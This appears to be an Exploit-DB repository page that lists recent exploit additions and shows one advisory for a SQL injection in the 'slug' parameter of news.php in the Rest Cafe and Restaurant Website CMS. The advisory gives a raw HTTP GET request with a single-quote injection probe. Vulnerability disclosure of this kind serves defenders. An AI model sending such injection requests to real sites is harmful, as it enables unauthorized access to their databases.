
3 changes to exploits/shellcodes Ultimate Loan Manager 2.0 - Cross-Site Scripting WebIncorp ERP - SQL injection Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery Ultimate Loan Manager 2.0 - Cross-Site Scripting WebIncorp ERP - SQL injection Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery Sar2HTML 3.2.1 - Remote Command Execution Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection 1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting
18 lines
No EOL
709 B
Text
18 lines
No EOL
709 B
Text
# Exploit Title: Rest - Cafe and Restaurant Website CMS - SQL Injection
|
|
# Date: 1.8.2019.
|
|
# Exploit Author: n1x_ [MS-WEB]
|
|
# Vendor Homepage: https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154
|
|
# CWE : CWE-89
|
|
|
|
Vulnerable parameter: slug (news.php)
|
|
|
|
[GET Request]
|
|
|
|
GET //host/[path]/news.php?slug=x' HTTP/1.1
|
|
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
|
|
Accept-Encoding: gzip, deflate, br
|
|
Accept-Language: en-US
|
|
Cache-Control: max-age=0
|
|
Cookie: PHPSESSID=87e839a144a7c326454406dea88b92bc
|
|
Host: host
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362 |